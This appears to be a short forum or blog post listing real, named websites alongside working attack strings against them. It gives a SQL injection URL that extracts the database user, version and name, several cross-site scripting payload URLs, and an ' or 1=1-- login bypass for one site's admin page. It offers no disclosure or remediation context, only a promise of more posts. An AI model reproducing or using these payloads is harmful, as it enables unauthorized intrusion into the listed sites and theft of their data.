Vulnerable to SQL injection:
http://www.elfinanciero.cl/ver_detallecursos.php?recordID=367+and+1=0+union+select+all+1,2,3,concat_ws(0x3A,user(),version(),database()),5,6,7,8,9,10,11,12,13,14,15+--+
XSS:
http://www.servipag.com/browse.asp?pagina=web/msgerror.htm&mensaje_error=%3C/a%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E
http://www.bathstudent.com/404/?url=%3Ch1%3E%3C/a%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E
http://www.barragantv.net:80/videos.php?pag=1<ScRiPt%20%0a%0d>alert(0)%3B</ScRiPt>
http://www.bibliodrogas.cl/biblioteca/web/resultados2.php?pag=1&solo_digital=&Buscar_Por=03&Fin_Consulta=&sec_busqueda=382758&sec_canasto=0&accion=.&FILTRO=%28+DESCRIPTORES+like+%27%25\&Txt_Busqueda=%22%3Cscript%3Ealert%28%2Fxss%2F%29%3C%2Fscript%3E
Bypass:
http://www.novovision.cl/admin/
user ' or 1=1--
pass ' or 1=1--
Check out my other posts!!
Later on I will create a post about security!!!!